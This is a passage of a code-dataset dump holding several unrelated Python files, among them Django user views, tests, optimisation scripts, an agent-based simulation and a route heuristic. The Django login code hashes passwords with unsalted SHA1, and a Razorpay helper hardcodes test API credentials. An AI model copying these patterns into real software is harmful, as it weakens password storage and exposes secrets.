= a combination of year and semester, where year is in YYYY format and semester is either 1 or 2.\n \"\"\"\n \n # open province data \n with open(os.getcwd() + '/output/province/province-20191.json', 'r') as json_file:\n data = json.load(json_file)\n\n # get province code\n province_code = []\n for d in data:\n province_code.append(d.get('kode_wilayah').replace(\" \", \"\"))\n\n # base url which is needed to get each district data\n url = 'http://dapo.dikdasmen.kemdikbud.go.id/rekap/progres?&id_level_wilayah=1&kode_wilayah={}&semester_id={}'\n\n # store URLs into a list\n urls = []\n for i in province_code:\n for j in semester_id:\n urls.append(url.format(i, j))\n \n return urls\n \ndef main(urls):\n \"\"\"\n Returns data pokok pendidikan at district level in JSON format.\n \"\"\"\n\n file_name = urls.translate(str.maketrans('', '', punctuation))\n i = 0\n while i < NUM_RETRY:\n try:\n response = requests.get(urls, timeout = TIMEOUT)\n if response.status_code == 200:\n with open(OUTPUT_PATH + '{}.json'.format(file_name), 'w') as json_file:\n json.dump(response.json(), json_file)\n i = NUM_RETRY\n except Exception:\n sleep(SLEEP_TIME)\n i += 1\n\nif __name__ == \"__main__\":\n\n semester_id = argv[5].split(',')\n # run multiple tasks in parallel\n result = Pool(NUM_POOL).map(main, district(semester_id))","sub_path":"src/district.py","file_name":"district.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"402736114","text":"from test_utils import TestApi\nfrom test_utils.factories import InstanceFactory\n\nfrom app_models.models import Profile\n\nfrom profiles.serializers import ProfileSerializer\n\n\nclass TestProfile(TestApi):\n base_url = '/api/profiles/'\n instance_url_lookup_field = 'user__username'\n model_class = Profile\n serializer_class = ProfileSerializer\n\n def instance_url(self, instance) -> str:\n return '{}{}/'.format(self.base_url, instance.user.username)\n\n @property\n def ref_instance(self):\n return self.red_profile\n\n def setUp(self):\n super().setUp()\n\n self.red_profile = InstanceFactory.create_profile('red')\n self.roy_profile = InstanceFactory.create_profile('stranger')\n\n def test_serialization(self):\n expected = ['username', 'email', 'name', 'created_at']\n\n serializer = self.serializer_class(self.red_profile)\n\n for item in expected:\n self.assertIn(item, serializer.data)\n\n self.assertEqual(len(serializer.data), len(expected))\n\n def test_permissions(self):\n self.anonymous_user_401()\n\n def test_auto_create(self):\n user, _ = InstanceFactory.create_user('auto_create_profile')\n self.model_class.objects.get(user=user)\n\n def test_list(self):\n response = self.list([self.red_profile.user], 200)[self.red_profile.user]\n\n self.assertEqual(len(response.data['results']), 1)\n self.assertEqual(response.data['results'][0], ProfileSerializer(self.roy_profile).data)\n\n for i in range(0, 20):\n InstanceFactory.create_user('u_{}'.format(i))\n for i in range(0, 5):\n friend_user, _ = InstanceFactory.create_user('f_{}'.format(i))\n InstanceFactory.create_friendship_two_way(self.red_profile.user, friend_user)\n\n user_count = Profile.objects.all().count()\n self.assertEqual(user_count, 1 + 1 + 20 + 5)\n\n response = self.list([self.red_profile.user], 200)[self.red_profile.user]\n self.assertEqual(len(response.data['results']), 10)\n self.assertEqual(response.data['item_count'], user_count - 1)\n\n def test_create(self):\n users = [self.red_profile.user, self.roy_profile.user]\n self.create(users, 405, {})\n\n def test_retrieve(self):\n users_200 = [self.red_profile.user, self.roy_profile.user]\n responses = self.retrieve(users_200, 200)\n\n self.assertEqual(responses[self.red_profile.user].data, self.serializer_class(self.red_profile).data)\n self.assertEqual(responses[self.roy_profile.user].data, self.serializer_class(self.red_profile).data)\n\n def test_update(self):\n data = self.serializer_class(self.red_profile).data\n data['name'] = 'updated name'\n\n self.update([self.roy_profile.user], 403, {})\n\n self.update([self.red_profile.user], 200, data)\n\n self.assertEqual(Profile.objects.get(user=self.red_profile.user).name, 'updated name')\n\n def test_me(self):\n response = self.client.get(self.base_url + 'me/', content_type=self.content_type)\n self.assertEqual(response.status_code, 401)\n\n self.client.force_authenticate(self.red_profile.user)\n response = self.client.get(self.base_url + 'me/', content_type=self.content_type)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['username'], self.red_profile.user.username)\n","sub_path":"profiles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530703079","text":"import asyncio\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef test_loop():\n old_loop = asyncio.get_event_loop()\n new_loop = asyncio.new_event_loop()\n try:\n asyncio.set_event_loop(new_loop)\n yield new_loop\n finally:\n asyncio.set_event_loop(old_loop)\n new_loop.close()\n","sub_path":"test/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"18382876","text":"from typing import TYPE_CHECKING\n\nfrom dvc.scheme import Schemes\n\nif TYPE_CHECKING:\n from .index import ObjectDBIndexBase\n\n\ndef get_odb(fs, path_info, **config):\n from .base import ObjectDB\n from .gdrive import GDriveObjectDB\n from .local import LocalObjectDB\n from .oss import OSSObjectDB\n\n if fs.scheme == Schemes.LOCAL:\n return LocalObjectDB(fs, path_info, **config)\n\n if fs.scheme == Schemes.GDRIVE:\n return GDriveObjectDB(fs, path_info, **config)\n\n if fs.scheme == Schemes.OSS:\n return OSSObjectDB(fs, path_info, **config)\n\n return ObjectDB(fs, path_info, **config)\n\n\ndef _get_odb(repo, settings):\n from dvc.fs import get_cloud_fs\n\n if not settings:\n return None\n\n cls, config, path_info = get_cloud_fs(repo, **settings)\n config[\"tmp_dir\"] = repo.tmp_dir\n return get_odb(cls(**config), path_info, state=repo.state, **config)\n\n\ndef get_index(odb) -> \"ObjectDBIndexBase\":\n import hashlib\n\n from .index import ObjectDBIndex, ObjectDBIndexNoop\n\n cls = ObjectDBIndex if odb.tmp_dir else ObjectDBIndexNoop\n return cls(\n odb.tmp_dir,\n hashlib.sha256(odb.path_info.url.encode(\"utf-8\")).hexdigest(),\n odb.fs.CHECKSUM_DIR_SUFFIX,\n )\n\n\nclass ODBManager:\n CACHE_DIR = \"cache\"\n CLOUD_SCHEMES = [\n Schemes.S3,\n Schemes.GS,\n Schemes.SSH,\n Schemes.HDFS,\n Schemes.WEBHDFS,\n ]\n\n def __init__(self, repo):\n self.repo = repo\n self.config = config = repo.config[\"cache\"]\n self._odb = {}\n\n local = config.get(\"local\")\n\n if local:\n settings = {\"name\": local}\n elif \"dir\" not in config:\n settings = None\n else:\n from dvc.config_schema import LOCAL_COMMON\n\n settings = {\"url\": config[\"dir\"]}\n for opt in LOCAL_COMMON.keys():\n if opt in config:\n settings[str(opt)] = config.get(opt)\n\n self._odb[Schemes.LOCAL] = _get_odb(repo, settings)\n\n def _init_odb(self, schemes):\n for scheme in schemes:\n remote = self.config.get(scheme)\n settings = {\"name\": remote} if remote else None\n self._odb[scheme] = _get_odb(self.repo, settings)\n\n def __getattr__(self, name):\n if name not in self._odb and name in self.CLOUD_SCHEMES:\n self._init_odb([name])\n\n try:\n return self._odb[name]\n except KeyError as exc:\n raise AttributeError from exc\n\n def by_scheme(self):\n self._init_odb(self.CLOUD_SCHEMES)\n yield from self._odb.items()\n","sub_path":"dvc/objects/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491853482","text":"from django.shortcuts import render\nfrom django.http.response import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom hashlib import sha1\nfrom df_user.models import *\nfrom .islogin import *\nfrom df_goods.models import *\n\n# Create your views here.\ndef register(request):\n context = {'title':'注册'}\n return render(request, 'df_user/register.html', context)\n\t\ndef register_handle(request):\n # 接收用户输入信息\n post = request.POST\n uname = post.get('user_name')\n upwd = post.get('pwd')\n ucpwd = post.get('cpwd')\n uemail = post.get('email')\n #print(uname, upwd, ucpwd, uemail)\n \n # 判断两次输入的密码是否一致\n if upwd != ucpwd:\n return HttpResponseRedirect('/df_user/register')\n \n # 对密码原文进行sha1的加密\n # 创建sha1的对象\n s1 = sha1()\n # 对passswd进行sha1的加密\n #s1.update(passwd) # python2的写法\n s1.update(upwd.encode()) # python3的写法\n upwd2 = s1.hexdigest()\n \n # 创建对象 填入数据 然后插入数据库中\n user = UserInfo()\n user.uname = uname\n user.upwd = upwd2\n user.uemail = uemail\n user.save()\n \n return HttpResponseRedirect('/df_user/login')\n\t\n\t\ndef register_exist(request):\n # 接收用户传入的uname参数\n get = request.GET\n uname = get.get('uname')\n \n # 在数据库中查找是否有该用户名\n count = UserInfo.objects.filter(uname=uname).count()\n return JsonResponse({'count':count})\n\t\ndef login(request):\n\tcontext = {'title':'登入'}\n\treturn render(request, 'df_user/login.html', context)\n\t\ndef login_handle(request):\n # 接收用户输入信息\n post = request.POST\n uname = post.get('username')\n upwd = post.get('pwd')\n jizhu = post.get('jizhu')\n \n # 根据用户名和密码查询数据库\n users = UserInfo.objects.filter(uname = uname)\n if len(users) >= 1:\n #print(users[0].upwd)\n \n # 对密码原文进行sha1的加密\n # 创建sha1的对象\n s1 = sha1()\n #s1.update(passwd) # python2的写法\n s1.update(upwd.encode()) # python3的写法\n upwd2 = s1.hexdigest()\n \n # 和数据库中的密文进行比较\n if upwd2 == users[0].upwd:\n url = request.COOKIES.get('url', '/df_user/info')\n red = HttpResponseRedirect(url) \n \n if jizhu:\n red.set_cookie('uname', uname)\n else:\n red.set_cookie('uname', '')\n\n # 登录成功\n request.session['user_id'] = users[0].id\n request.session['user_name'] = uname\n \n return red\n else:\n # 登录失败,密码错误\n context = {'title':'登录','error_pwd':1,'error_name':0}\n return render(request, 'df_user/login.html', context)\n\n else:\n # 用户名找不到\n context = {'title':'登录','error_name':1,'error_name':0}\n return render(request, 'df_user/login.html', context)\n\t\t\n@islogin\t\t\ndef info(request):\n user_email = UserInfo.objects.get(id = request.session['user_id']).uemail\n user_address = UserInfo.objects.get(id = request.session['user_id']).uaddress\n user_phone = UserInfo.objects.get(id = request.session['user_id']).uphone\n\t\n\t # 从cookies中读取最近浏览的信息\n goods_ids = request.COOKIES.get('goods_ids')\n if goods_ids and goods_ids != '':\n goods_ids = goods_ids.split(',')\n else:\n goods_ids = []\n # 遍历goods_ids列表 根据id搜索出每个产品 并添加到产品列表中\n goods_list = []\n for id in goods_ids:\n if id != '':\n goods = GoodsInfo.objects.get(id=id)\n goods_list.append(goods)\n\t\n\t\n\t\n\t\n\t\n context = {'title': '用户中心', \n 'user_name' : request.session['user_name'],\n 'user_email' : user_email,\n 'user_address': user_address,\n 'user_phone': user_phone,\n\t\t\t 'page_name': 1,\n\t\t\t 'info':1,\n\t\t\t 'goods_list':goods_list}\n return render(request, 'df_user/user_center_info.html',context)\n\t\n@islogin\ndef order(request):\n\tcontext = {'title':'全部订单',\n\t\t\t\t'page_name': 1,\n\t\t\t\t'order':1}\n\treturn render(request,'df_user/user_center_order.html', context)\n\n\t\n@islogin\ndef site(request):\n user = UserInfo.objects.get(id = request.session['user_id'])\n if request.method == 'POST':\n # 当用户通过表单提交信息的时候 request.method=\"POST\" 此时获取提交过来的参数 并保存到数据库中\n post = request.POST\n user.ushou = post.get('ushou')\n user.uaddress = post.get('uaddress')\n user.uyoubian = post.get('uyoubian')\n user.uphone = post.get('uphone')\n user.save()\n else:\n # 当用户通过url直接访问df_user/site 的时候 request.method=\"GET\" 此时无需进行任何操作 直接通过模型类获取属性即可\n pass\n \n context = {'title': '用户中心',\n 'ushou' : user.ushou,\n 'uaddress': user.uaddress,\n 'uphone': user.uphone,\n\t\t\t 'page_name': 1,\n 'site': 1}\n return render(request, 'df_user/user_center_site.html', context)\n\t\ndef logout(request):\n request.session.flush() # 清理session缓存\n return HttpResponseRedirect('/df_user/login')\n\n\t\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\n\t","sub_path":"df_user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505612508","text":"import numpy as np\nfrom numpy.linalg import inv\nfrom numpy.linalg import eigvals\n\nclass NewtonMethod(object):\n \n\tdef __init__(self, Q, p, A, b):\n\t\tif not self._check_spd(Q):\n\t\t\tprint('The matrix Q is not semi-definite positive!')\n\t\t# the matrix Q should be symmetric\n\t\tself.Q = Q\n\t\tself.p = p\n\t\tself.A = A\n\t\tself.b = b\n\t\n\tdef _back_tracking(self, t, x, dx, alpha = 0.4, beta = 0.8):\n\t\t_t = 1. # initialize the step length to be 1.\n\t\tdf = self._gradient(x, t)\n\t\tfx = self._f(x, t)\n\t\t\n\t\t# update the step function\n\t\txx = x + _t * dx\n\t\t\n\t\twhile(self._f(xx, t) >= fx + alpha * _t * dx @ df):\n\t\t\t_t = beta * _t\n\t\t\txx = x + _t * dx\n\n\t\treturn _t * dx\n \n\tdef _check_spd(self, Q):\n\t\treturn np.all(eigvals(Q) >= 0)\n\t\n\tdef _f (self, v, t):\n\t\t# evaluation function given v and t\n\t\treturn t * (v @ self.Q @ v + self.p @ v) \\\n\t\t\t\t- np.sum(np.log(self.b - self.A @ v))\n \n\tdef evaluate(self, v):\n\t\treturn v @ self.Q @ v + self.p @ v\n \n\tdef _gradient(self, x, t):\n\t\t# compute the gradient of the target function\n\t\treturn 2 * t * self.Q @ x + t * self.p + np.sum(self.A.T / (self.b - self.A @ x), axis=1)\n\t\n\tdef _gradient_second(self, x, t):\n\t\t# compute the second derivative\n\t\tM = self.A.T / (self.b - self.A @ x)\n\t\treturn 2 * t * self.Q + t * M @ M.T\n\t\n\tdef centering_step(self, t, v0, eps):\n\t\tv = v0\n\t\tnorm = np.linalg.norm\n\t\tdf = self._gradient(v, t)\n\t\tH = self._gradient_second(v, t)\n\t\tdx = -inv(H) @ df\n\t\thistory = [v0]\n\t\twhile(- df @ dx / 2 >= eps):\n\t\t\tH = self._gradient_second(v, t)\n\t\t\tdf = self._gradient(v, t)\n\t\t\tdx = -inv(H) @ df\n\t\t\tdx_prime = self._back_tracking(t, v, dx)\n\t\t\tv = v + dx_prime\n\t\t\thistory.append(v)\n\t\treturn v, history\n\t\n\tdef barr_method(self, v0, eps, mu = 10):\n\t\tv = v0\n\t\tm = self.A.shape[0]\n\t\thistory = [v0]\n\t\thistory_all = []\n\t\tt = 1\n\t\twhile(m / t >= eps):\n\t\t\tv, _history = self.centering_step(t, v, 0.01)\n\t\t\tt = mu * t\n\t\t\tprint(self.evaluate(v))\n\t\t\thistory.append(v)\n\t\t\thistory_all.append(_history)\n\t\treturn v, history, history_all\n\nn = 100\nd = 1000\n\nreg = 10\n\ny = np.random.uniform(size = (n))\nX = np.random.uniform(size = (n, d))\n\nQ = np.identity(n) / 2\np = -y\nA = np.vstack([X.T, -X.T])\nb = np.repeat(reg, 2 * d)\n\nqp = NewtonMethod(Q, p, A, b)\nv0 = np.random.uniform(size = (n))\n\nmus = [10, 15, 20, 40, 80, 100]\n\nimport matplotlib.pyplot as plt\n\nfig, ax = plt.subplots()\nfor mu in mus:\n\tv_, h_, h_all = qp.barr_method(v0, 0.00001, mu = mu)\n\thv_ = [qp.evaluate(v) for v in h_]\n\thv_ = hv_ - min(hv_)\n\tax.semilogy(np.arange(len(hv_)), hv_, label = r'$\\mu = $'+str(mu))\nax.legend(loc='upper right')\nax.set_title('Precision Against Iterations')\nax.set_ylabel(r'$f(v_t) - f^*$')\nax.set_xlabel('Iteration')\n\nfig.savefig('visual.pdf')","sub_path":"optim/barrier.py","file_name":"barrier.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83190596","text":"# Basic version of agents where they select random actions\n\nfrom mesa import Agent\nimport pandas as pd\n\nfrom . import AgentConstants\n\n\nclass RandomAgent(Agent):\n def __init__(self, unique_id, model):\n super().__init__(unique_id, model)\n if self.model.privacyPopulation == -1:\n p = self.random.uniform(0, 1)\n if p <= 0.455:\n self.privacyType = AgentConstants.CAUTIOUS\n self.pleasure = 0.1\n self.recognition = 0.2\n self.privacy = 1\n self.security = 0.7\n elif p <= 0.818:\n self.privacyType = AgentConstants.CONSCIENTIOUS\n self.pleasure = 0.4\n self.recognition = 0.6\n self.privacy = 0.5\n self.security = 0.6\n else:\n self.privacyType = AgentConstants.CASUAL\n self.pleasure = 1\n self.recognition = 0.7\n self.privacy = 0\n self.security = 0.3\n elif self.model.privacyPopulation == 0:\n self.privacyType = AgentConstants.CAUTIOUS\n self.pleasure = 0.1\n self.recognition = 0.2\n self.privacy = 1\n self.security = 0.7\n elif self.model.privacyPopulation == 1:\n self.privacyType = AgentConstants.CONSCIENTIOUS\n self.pleasure = 0.4\n self.recognition = 0.6\n self.privacy = 0.5\n self.security = 0.6\n elif self.model.privacyPopulation == 2:\n self.privacyType = AgentConstants.CASUAL\n self.pleasure = 1\n self.recognition = 0.7\n self.privacy = 0\n self.security = 0.3\n self.happy = 0\n self.currentAction = AgentConstants.SHARE_NO\n self.friends = self.model.relationship.adj[unique_id]\n self.currentCompanions = []\n self.reward = 0\n\n\n def step(self):\n self.decision()\n self.move()\n\n # Function for mobility pattern modeling\n\n def move(self):\n x = self.pos\n\n # Might need y later\n newY = 0\n\n p = self.random.uniform(0, 1)\n # Chance of each place is uniform\n if p <= (1 / 9):\n newX = AgentConstants.BEACH\n elif p <= (2 / 9):\n newX = AgentConstants.MUSEUM\n elif p <= (3 / 9):\n newX = AgentConstants.COMPANY\n elif p <= (4 / 9):\n newX = AgentConstants.SURGERY\n elif p <= (5 / 9):\n newX = AgentConstants.EXAM\n elif p <= (6 / 9):\n newX = AgentConstants.COMPETITION\n elif p <= (7 / 9):\n newX = AgentConstants.FUNERAL\n elif p <= (8 / 9):\n newX = AgentConstants.TYPHOON\n else:\n newX = AgentConstants.SPEED_TICKET\n self.model.grid.move_agent(self, (newX, newY))\n\n # Function for the decision making process of the agent\n # At each given location, the agent decides whether or not it wants to share a photo with the public,\n # common friends, or no one.\n def decision(self):\n location = self.pos\n str_location = AgentConstants.map_cords_to_places(location)\n\n actions_values = self.processLocation(str_location)\n\n # Determine which action to take\n # Basic version: add up all the values in each row, and see which one is largest\n no_value = (actions_values.loc[:, 'SHARE_NO']).sum()\n friends_value = (actions_values.loc[:, 'SHARE_FRIENDS']).sum()\n public_value = (actions_values.loc[:, 'SHARE_PUBLIC']).sum()\n\n p = self.random.uniform(0, 1)\n if p <= (1/3):\n best_action = no_value\n elif p <= (2/3):\n best_action = friends_value\n else:\n best_action = public_value\n\n # Set an intermediate currentAction for other agents to see what action you've chosen\n if best_action == no_value:\n self.currentAction = AgentConstants.SHARE_NO\n elif best_action == friends_value:\n self.currentAction = AgentConstants.SHARE_FRIENDS\n elif best_action == public_value:\n self.currentAction = AgentConstants.SHARE_PUBLIC\n\n current_companions = self.updateCompanions()\n\n best_action, reward = self.processCompanions(best_action, current_companions)\n self.reward = reward\n\n # Check if the agent is happy with the action taken\n # best_action is an int from 0 to 40, we determine an agent to be happy if it is greater than 8\n self.happy = best_action\n\n # Function for agents to evaluate their preferences in a given location, returns an array of with attributes of\n # each actions\n def processLocation(self, location):\n attributes = AgentConstants.places.loc[:, location]\n\n # Calculate the new values with places_attribute * agent_attribute, then return all of it as an array\n preferences = pd.Series(data=[self.pleasure, self.recognition, self.privacy, self.security],\n index=AgentConstants.places.index)\n new_preferences = pd.Series(data=(preferences.values * attributes.values), index=AgentConstants.places.index)\n\n # Compute the values of each action, action_values * new_preference.values\n # Format:\n # SHARE_NO SHARE_FRIENDS SHARE_PUBLIC\n # pleasure x x x\n # recognition x x x\n # privacy x x x\n # security x x x\n no_values = AgentConstants.actions.loc[:, 'SHARE_NO']\n friend_values = AgentConstants.actions.loc[:, 'SHARE_FRIENDS']\n public_values = AgentConstants.actions.loc[:, 'SHARE_PUBLIC']\n actions_values = pd.DataFrame(data={'SHARE_NO': (no_values * new_preferences.values),\n 'SHARE_FRIENDS': (friend_values * new_preferences.values),\n 'SHARE_PUBLIC': (public_values * new_preferences.values)},\n index=AgentConstants.actions.index, columns=AgentConstants.actions.columns)\n return actions_values\n\n # Function for getting the agent's current companions, and updating that list for later use\n def updateCompanions(self):\n self.currentCompanions.clear()\n\n # Get all agents that are friends and in the same location with the user\n current_companions = [agent for agent in self.model.schedule.agents\n if agent.unique_id in self.friends and agent.pos == self.pos]\n\n for k in current_companions:\n self.currentCompanions.append(k.unique_id)\n\n return current_companions\n\n # Function for checking if anyone in the agent's social circle is in the same location, alter the values for actions\n # based on companion's preferences if necessary\n def processCompanions(self, best_action, current_companions):\n\n reward = 0\n\n # Look through other companion's preferences, then tweak values for actions accordingly\n for i in current_companions:\n if i.currentAction == self.currentAction:\n reward += 5\n elif i.currentAction != self.currentAction:\n reward -= 2\n\n if reward != 0:\n reward = (reward * 2) / len(current_companions)\n\n best_action += reward\n\n return best_action, reward","sub_path":"PrivacyModel/agents/RandomAgent.py","file_name":"RandomAgent.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"639378368","text":"from sample import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Berechne EDMD mit unseren Basisfunktionen und vergleiche Approximation\n\n\ntrajectory = get_sampled_trajectory(\"weakly_pendulum\")\nX = trajectory[:-1]\nY = trajectory[1:]\nP = len(trajectory)\ndim = 12\n\ndef basis(x):\n basis = [np.sin(x), np.sin(x) * np.cos(x), np.sin(x) * np.power(np.cos(x), 2), np.power(np.sin(x), 3),\n np.power(np.sin(x), 3) * np.cos(x), np.power(np.cos(x), 3) * np.sin(x),\n np.power(np.sin(x), 3) * np.power(np.cos(x), 2), np.power(np.sin(x), 3) * np.power(np.cos(x), 3),\n np.power(np.sin(x), 6), np.power(np.sin(x), 6) * np.cos(x),\n np.power(np.sin(x), 6) * np.power(np.cos(x), 2), np.power(np.sin(x), 6) * np.power(np.cos(x), 3)]\n return basis\n\ndef basis2(x):\n basis = []\n for k in range(dim):\n basis += [np.sin(x) * np.power(np.cos(x), k)]\n return basis\n\ndef A_matrix(gX, gY):\n A = np.zeros((dim, dim))\n for p in range(gX.shape[0]):\n A += np.matmul(gX[p].reshape(-1,1), gY[p].reshape(1,-1))\n return A\n\ndef G_matrix(gX):\n G = np.zeros((dim, dim))\n for p in range(gX.shape[0]):\n G += np.matmul(gX[p].reshape(-1,1), gX[p].reshape(1,-1))\n return G\n\ndef koopman_operator():\n gX, gY= [], []\n for x in X:\n gX += [basis(x)]\n for y in Y:\n gY += [basis(y)]\n\n gX, gY = np.array(gX), np.array(gY)\n \n A = 1/P * A_matrix(gX, gY)\n G = 1/P * G_matrix(gX)\n \n G = np.linalg.inv(G)\n print(np.linalg.cond(G))\n K = np.matmul(G, A)\n\n return K\n\n\nK = koopman_operator()\n\n# print(\"Shape of the Koopman operator: \", K.shape)\n# print(K)\n#\n# basis_vector = 0\n# x0 = np.pi - 1e-2\n# steps = 500\n# pred = 0\n# ph = 5\n# mpc = []\n#\n# koopman_preds = []\n# for s in range(0, steps, ph):\n# abasis = basis(trajectory[s])\n# for m in range(ph):\n# for k in range(dim):\n# pred += np.linalg.matrix_power(K, m)[:, basis_vector][k] * abasis[k]\n# mpc += [pred]\n# pred = 0\n\nbasis_vector = 0\nx0 = np.pi - 1e-2\nsteps = 105\npred = 0\n\nkoopman_preds = []\nbasis = basis(x0)\nfor s in range(steps):\n for k in range(dim):\n pred += np.linalg.matrix_power(K, s)[:, basis_vector][k] * basis[k]\n koopman_preds += [pred]\n pred = 0\n\nprint(koopman_preds[:5])\n#t = np.linspace(0, 20, num=500)\n#t2= t[:105]\nfig, ax = plt.subplots()\nax.plot(np.sin(trajectory), label='sin(x(t))')\nax.plot(koopman_preds, label='[K^t]sin(x_0)')\nax.set(xlabel='time-steps', ylabel='sin(θ)', title='Approximating the simple pendulum with EDMD with a ' + str(K.shape[0]) +'-dim basis')\nax.grid()\nplt.legend()\nplt.ylim(-0.05, 1.05)\nfig.savefig(str(K.shape[0]) + \"dimEDMD.pdf\")\nplt.show()\n\n# plt.plot(t, koopman_preds, label='koopman prediction')\n# plt.plot(t, np.sin(trajectory), label='lifted trajectory')\n# plt.legend()\n# plt.ylim(-0.1, 1.1)\n# plt.show()","sub_path":"edmd.py","file_name":"edmd.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121553195","text":"import razorpay\n\nclient = razorpay.Client(auth=(\"rzp_test_P67ytGK6zecgQ9\",\"AhBlgfthDyjHMEbfLHWUmFh2\"))\nclient.set_app_details({\"title\":\"Django\"})\n\n\ndef create_order(amount,receipt,currency='INR',payment_capture=1,notes={}):\n razorpay_order_id = client.order.create(data={\n \"amount\":int(amount*100),\n \"currency\":currency,\n \"receipt\":receipt,\n \"payment_capture\":payment_capture,\n \"notes\":notes\n })\n return razorpay_order_id\n\n\ndef fetch_order(order_id):\n return client.order.fetch(order_id)\n\n\ndef refund(order_id,amount):\n client.payment.refund(order_id,f\"{int(amount*100)}\")\n ","sub_path":"locie/gadgets/razorpay.py","file_name":"razorpay.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572023669","text":"from string_util import reverse, count_whitespace_chars\n\n\nclass Eraser:\n def __init__(self, durability=100):\n self.durability = durability\n\n def erase(self, toErase, text):\n self._erase_preconditions(toErase, text)\n reversedText = reverse(text)\n reversedToErase = reverse(toErase)[:self.durability + count_whitespace_chars(toErase)]\n replaceWith = ' ' * len(reversedToErase)\n self.durability -= len(replaceWith)\n\n editedText = reverse(reversedText.replace(reversedToErase, replaceWith, 1))\n self._erase_postconditions(text, editedText)\n return editedText\n\n def _erase_preconditions(self, toErase, text):\n if type(toErase) is not str:\n raise ValueError('expected toErase to be of type \"str\"')\n if type(text) is not str:\n raise ValueError('expected text to be of type \"str\"')\n\n def _erase_postconditions(self, text, editedText):\n if len(editedText) > len(text):\n raise ValueError('erased text became longer than original text')\n","sub_path":"eraser.py","file_name":"eraser.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306195895","text":"import math\nimport sys\nimport random\n\n\nclass CitiesPath:\n\tdef __init__(self, number_of_cities, cities):\n\t\tself.number_of_cities = number_of_cities # Numbers of cities in the data file\n\t\tself.original_cities = cities # List with the original cities\n\t\tself.cities = self.original_cities[:] # List used to manipulate the cities available\n\t\tself.best_path = list() # Holds the best path\n\t\tself.best_path_distance = math.inf # Total distance of best path\n\t\tself.current_path = list() # Holds the current path\n\t\tself.it = 0 # Number of iterations\n\t\t\n\t\tself.MIN_DISTANCE = math.inf\n\t\tself.MAX_DISTANCE = 0\n\t\n\tdef reset(self):\n\t\tself.cities = self.original_cities[:]\n\t\tself.current_path = list()\n\n\tdef print_path(self, path):\n\t\tresult = \"\"\n\t\tfor city in path:\n\t\t\tresult += f'=> |{city[2]}| '\n\t\treturn result\n\t\n\tdef print_status(self):\n\t\tself.best_path_distance = self.total_distance(self.best_path)\n\t\tprint(f'{self.it} - {self.best_path_distance}\\r')\n\t\n\tdef distance_between_cities(self, a, b):\n\t\treturn math.sqrt(math.pow(b[0] - a[0], 2) + math.pow(b[1] - a[1], 2))\n\t\n\tdef closest_city(self, a):\n\t\tmin_dist = math.inf\n\t\tmin_dist_city = tuple()\n\t\tfor c in self.cities:\n\t\t\tdist = self.distance_between_cities(a, c)\n\t\t\tif c[2] != a[2] and dist < min_dist:\n\t\t\t\tmin_dist = dist\n\t\t\t\tmin_dist_city = c\n\t\t\n\t\treturn min_dist_city, min_dist\n\t\n\tdef total_distance(self, path):\n\t\tdistance_sum = 0\n\t\tfor index in range(0, len(path) - 1):\n\t\t\tdist = self.distance_between_cities(path[index], path[index + 1])\n\t\t\tdistance_sum += dist\n\t\t\n\t\treturn distance_sum\n\t\n\tdef find_greedy_path(self):\n\t\t\n\t\tself.current_path.append(self.cities.pop(random.randint(0, len(self.cities) - 1)))\n\t\t\n\t\twhile len(self.cities) > 0:\n\t\t\tnext_city, next_city_distance = self.closest_city(self.current_path[len(self.current_path) - 1])\n\t\t\t\n\t\t\tif next_city_distance > self.MAX_DISTANCE:\n\t\t\t\tself.MAX_DISTANCE = next_city_distance\n\t\t\tif next_city_distance < self.MIN_DISTANCE:\n\t\t\t\tself.MIN_DISTANCE = next_city_distance\n\t\t\t\t\n\t\t\tself.cities.remove(next_city)\n\t\t\tself.current_path.append(next_city)\n\t\t\n\t\tself.it += 1\n\t\treturn self.current_path\n\n\tdef find_genetic_path(self):\n\t\twhile 1:\n\t\t\t\n\t\t\tif len(self.current_path) == 0:\n\t\t\t\tnext_city = self.cities.pop(random.randint(0, len(self.cities) - 1))\n\t\t\t\tself.current_path.append(next_city)\n\t\t\t\n\t\t\tif len(self.cities) == 0:\n\t\t\t\tself.it += 1\n\t\t\t\tcurrent_path_distance = self.total_distance(self.current_path[:])\n\t\t\t\tif current_path_distance < self.best_path_distance:\n\t\t\t\t\tself.best_path_distance = float(current_path_distance)\n\t\t\t\t\tself.best_path = self.current_path[:]\n\t\t\t\t\tself.print_status()\n\t\t\t\tself.reset()\n\t\t\t\n\t\t\telse:\n\t\t\t\tcurrent_path_distance = self.total_distance(self.current_path[:])\n\t\t\t\tif current_path_distance > self.best_path_distance:\n\t\t\t\t\tself.reset()\n\t\t\t\telse:\n\t\t\t\t\tnext_city = self.cities.pop(random.randint(0, len(self.cities) - 1))\n\t\t\t\t\tdist = self.distance_between_cities(next_city, 